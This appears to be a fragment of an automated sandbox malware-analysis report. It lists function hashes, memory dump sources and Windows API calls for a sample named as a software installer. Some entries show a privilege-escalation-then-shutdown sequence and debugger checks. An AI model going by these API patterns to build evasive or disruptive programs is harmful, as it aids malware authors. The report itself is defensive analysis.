                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ErrorExitLastThread
                        • String ID:
                        • API String ID: 1611280651-0
                        • Opcode ID: e247a26a75645dab3399d39afaa198afee069d8a775906b282398aa830a9460a
                        • Instruction ID: efae2be3f887849e7bfb7100b48282d15b3461de0cad795bd2b5251b2efe8937
                        • Opcode Fuzzy Hash: e247a26a75645dab3399d39afaa198afee069d8a775906b282398aa830a9460a
                        • Instruction Fuzzy Hash: 79F0F6B4A10604AFDF15AFB1C509AAE3B74FF45314F284249E00197F90CF34698ACFA0
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: __wsopen_s
                        • String ID:
                        • API String ID: 3347428461-0
                        • Opcode ID: 35cf1cbc4f3ad3a060de5f0d37ba0f8567ad9fd66e7adec6b5d725cfba2dc13e
                        • Instruction ID: c3b957fd08976a929b1141a848bcfead031751bfbaf8c26715bf652aae7a589f
                        • Opcode Fuzzy Hash: 35cf1cbc4f3ad3a060de5f0d37ba0f8567ad9fd66e7adec6b5d725cfba2dc13e
                        • Instruction Fuzzy Hash: B2116A75A0420AAFCF09CF58EA4499F3BF8EF48308F04406AF804AB301D630E915CBA4
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                        • Instruction ID: c85752414efcda7aac81ad6647c80c492290f93dd17fd897f0aa8a0f0ba95a72
                        • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                        • Instruction Fuzzy Hash: 55014F72C01159BFCF019FA88D04AEE7FB5AF08314F144265F964E2650E7318AA9DB95
                        APIs
                        • CreateFileW.KERNEL32(00000000,00000000,?,6CA82F35,?,?,00000000,?,6CA82F35,00000000,0000000C), ref: 6CA83294
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 09421729f6445c3e2e6b549a26bd8f03895efeed75c3121d9557d1e62c6927f2
                        • Instruction ID: 13fa74f71d5c3a9ef607775192dbb8b8e60a66bc0c01d86dc6cdeb3d01495972
                        • Opcode Fuzzy Hash: 09421729f6445c3e2e6b549a26bd8f03895efeed75c3121d9557d1e62c6927f2
                        • Instruction Fuzzy Hash: 61D06C3211020EBBDF028E84DC06EDA3BAAFB48714F018100BA1856020C732E862AB90
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                        • Instruction ID: 3d0b8eeacd6939b96bfadade53b255ded7a94c0974d40c58c017d80fe10c3741
                        • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                        • Instruction Fuzzy Hash:
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 6CA64B8A
                        • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6CA64B96
                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6CA64BA4
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6CA64BCB
                        • NtInitiatePowerAction.NTDLL ref: 6CA64BDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                        • String ID: SeShutdownPrivilege
                        • API String ID: 3256374457-3733053543
                        • Opcode ID: f129f931ec93754daa18a7fbaaa5fd3dce2fd3c7452bbb061734078d283a328a
                        • Instruction ID: f6177b99b93c218db9010fb60d0bca7d5fca221b9ba51ced8bd00cd1f13b0e2f
                        • Opcode Fuzzy Hash: f129f931ec93754daa18a7fbaaa5fd3dce2fd3c7452bbb061734078d283a328a
                        • Instruction Fuzzy Hash: A3F054B4645300AFFA106F24DD0EB6A7BB4FF45701F004518F985A71D1E7B06994CBA3
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: \j`7$\j`7$j
                        • API String ID: 0-3644614255
                        • Opcode ID: 90b3a30ccc174e086eb2e0af6a0c546ec75f3522ad3d7f4022945a44fd2bd0db
                        • Instruction ID: 7c14aa8081186cd841be6d958001721d9751c7c3176c526c33ac139725a0bdbd
                        • Opcode Fuzzy Hash: 90b3a30ccc174e086eb2e0af6a0c546ec75f3522ad3d7f4022945a44fd2bd0db
                        • Instruction Fuzzy Hash: BB4223746093828FCB24CF68C58066ABBE1BBCA354F544E2EE499C7762D334E845CB53
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: _strlen
                        • String ID:
                        • API String ID: 4218353326-0
                        • Opcode ID: 9ae11a6b9a9182133928ba27a4ed9faace215a4f2d62e0406d2d7875d6a804b7
                        • Instruction ID: 50ae1c84ed9633594297d88f8320e8bbc26fc912c67457c47a041a7623744473
                        • Opcode Fuzzy Hash: 9ae11a6b9a9182133928ba27a4ed9faace215a4f2d62e0406d2d7875d6a804b7
                        • Instruction Fuzzy Hash: 0153F271645B018FC728CF2AC8D0AA5B7F2EF9531871D8A2DC1D68BE55E774B48ACB40
                        APIs
                        • __EH_prolog.LIBCMT ref: 6CAC4CE5
                          • Part of subcall function 6CA9AC2A: __EH_prolog.LIBCMT ref: 6CA9AC2F
                          • Part of subcall function 6CA9C6A6: __EH_prolog.LIBCMT ref: 6CA9C6AB
                          • Part of subcall function 6CAC4A0E: __EH_prolog.LIBCMT ref: 6CAC4A13
                          • Part of subcall function 6CAC4837: __EH_prolog.LIBCMT ref: 6CAC483C
                          • Part of subcall function 6CAC8143: __EH_prolog.LIBCMT ref: 6CAC8148
                          • Part of subcall function 6CAC8143: ctype.LIBCPMT ref: 6CAC816C
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog$ctype
                        • String ID:
                        • API String ID: 1039218491-3916222277
                        • Opcode ID: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                        • Instruction ID: c72c133aa9a6ca707469040f55159946dad10245c5362a39caabf17d013d5265
                        • Opcode Fuzzy Hash: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                        • Instruction Fuzzy Hash: 3203AD30905258DEDF15CFA4CA84BECBBB0AF15308F24409AE449A7791DB746BCDDB62
                        APIs
                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CA6F099
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CA6F0A3
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CA6F0B0
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: 64b9ab817974acdb6b7837c83439c945fd9cc020e8708c015a1c4a2cb16fb492
                        • Instruction ID: 3acd60883916d0fc480d1d585ee702e08726217c792509be52c780ed230f3677
                        • Opcode Fuzzy Hash: 64b9ab817974acdb6b7837c83439c945fd9cc020e8708c015a1c4a2cb16fb492
                        • Instruction Fuzzy Hash: 6831C2749512289BCB21DF69DD887CDBBB8BF08314F5042EAE41CA7690EB749BC58F44
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,?,6CA6E055,6CA68A69,00000003,00000000,6CA68A69,00000000), ref: 6CA6DFBF
                        • TerminateProcess.KERNEL32(00000000,?,6CA6E055,6CA68A69,00000003,00000000,6CA68A69,00000000), ref: 6CA6DFC6
                        • ExitProcess.KERNEL32 ref: 6CA6DFD8
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: Process$CurrentExitTerminate
                        • String ID:
                        • API String ID: 1703294689-0
                        • Opcode ID: c4802848eed981fd0f1038ce9e84b409744950355b2a32d8adeef938217f46f5
                        • Instruction ID: 47e0bc3d156d81423c7282a204dc6fbad28997db4a8db39e5b56ceb526b5538c
                        • Opcode Fuzzy Hash: c4802848eed981fd0f1038ce9e84b409744950355b2a32d8adeef938217f46f5
                        • Instruction Fuzzy Hash: FCE04631515209ABCF022F55C90DA8A3F78FF8538AB248524F804CAA21CF35D9D6CA90
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: x=J
                        • API String ID: 3519838083-1497497802
                        • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                        • Instruction ID: 2e17bac14967af58970cefc939f20e5e0e5d137ca06770608b3298034104a13e
                        • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                        • Instruction Fuzzy Hash: D991C131D311199BCF05DFA8D992AEDB7F1AF0530CF24806AD452E7A61DB3159C9CBA0
                        APIs
                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CA666D0
                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CA66EF3
                          • Part of subcall function 6CA68199: RaiseException.KERNEL32(E06D7363,00000001,00000003,6CA66EDC,00000000,?,?,?,6CA66EDC,?,6CA9354C), ref: 6CA681F9
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                        • String ID:
                        • API String ID: 915016180-0
                        • Opcode ID: cfc26f1f83205d77b7f67e7605fb57c26f3532850650e76c2e9842aef69f2e4b
                        • Instruction ID: 5528c1262cd9f6da546464d7bae4bc9aeb931d0209cc267e6f87abc2ea3b435d
                        • Opcode Fuzzy Hash: cfc26f1f83205d77b7f67e7605fb57c26f3532850650e76c2e9842aef69f2e4b
                        • Instruction Fuzzy Hash: 2AB1A0B5E112059FDB04CF66C4856ADBBF5FB49314F28822AE426E7B80D734D584CFA0
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: @4J$DsL
                        • API String ID: 0-2004129199
                        • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                        • Instruction ID: cc380541f0e89265e6def3bd3fecba2991c5126931a6096303db623752a4b0f8
                        • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                        • Instruction Fuzzy Hash: 082171377A49564BD74CCA28DC33EB926C0E745305B89627DE94BCB7D1DF5D8800C648
                        APIs
                        • __EH_prolog.LIBCMT ref: 6CAB340F
                          • Part of subcall function 6CAB4137: __EH_prolog.LIBCMT ref: 6CAB413C
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                        • Instruction ID: 217fdac09441ee1915ed85bdcfa655544bd439a27afa7cdfbdda0ed2c646fb8f
                        • Opcode Fuzzy Hash: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                        • Instruction Fuzzy Hash: CC625A71D02259CFDF15CFA4C990BEDBBB9BF08308F14415AE855AB680DB749A89CF90
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: YA1
                        • API String ID: 0-613462611
                        • Opcode ID: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                        • Instruction ID: 6372e35f2d18a8740bfed96540eeea184bdd0a72db7da5e067277cce2047ed81
                        • Opcode Fuzzy Hash: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                        • Instruction Fuzzy Hash: 7942AD717093818FC315DF28C49069ABFE2EFD9308F144A6DE8D68B752D771990ACB92
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: __aullrem
                        • String ID:
                        • API String ID: 3758378126-0
                        • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                        • Instruction ID: 31fc32a9032e40c672266a3517012798e04c60ed77c8bc8ca1c870806ed6c50e
                        • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                        • Instruction Fuzzy Hash: 6851F971A042559BD710CF5EC4C12EEFBF6EF79214F28C05EE8C897242D27A499AC760
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID: 0-3916222277
                        • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                        • Instruction ID: 83bf7dc84b903d1e26d01cb44c4d8a35ed08d818d49d144c58b4fdafff41fe32
                        • Opcode Fuzzy Hash: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                        • Instruction Fuzzy Hash: FB027A3160C3808BD725CF29C59079FBBE2FBC8318F194A2EE48597B51C7769949CB82
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: (SL
                        • API String ID: 0-669240678
                        • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                        • Instruction ID: bf15c6a6df0b6284ff46f33d4eefd7b520d388b87868b323f731374abd339749
                        • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                        • Instruction Fuzzy Hash: 01516473E208314AD78CCE24DC21B7672D2E784310F8BC1B99D4BAB6E6DD78989587D4
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                        • Instruction ID: 0161432c687acef76f0018efb1dd51d45861b52c3fffb2077ded92b5fa4d690d
                        • Opcode Fuzzy Hash: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                        • Instruction Fuzzy Hash: CE522E31708B858BD718CF29C59066ABBE2FB95308F148A2DD4DAC7B51DB74F849CB81
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                        • Instruction ID: 77f81d8778670ebb5246ed20f2afd12fd23f6d443f732f72a6821390030ca3a1
                        • Opcode Fuzzy Hash: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                        • Instruction Fuzzy Hash: B962F4B1A083858FC714CF1AC48056AFBE6FFC8744F248A2EE89997715D775E845CB82
                        Memory Dump Source
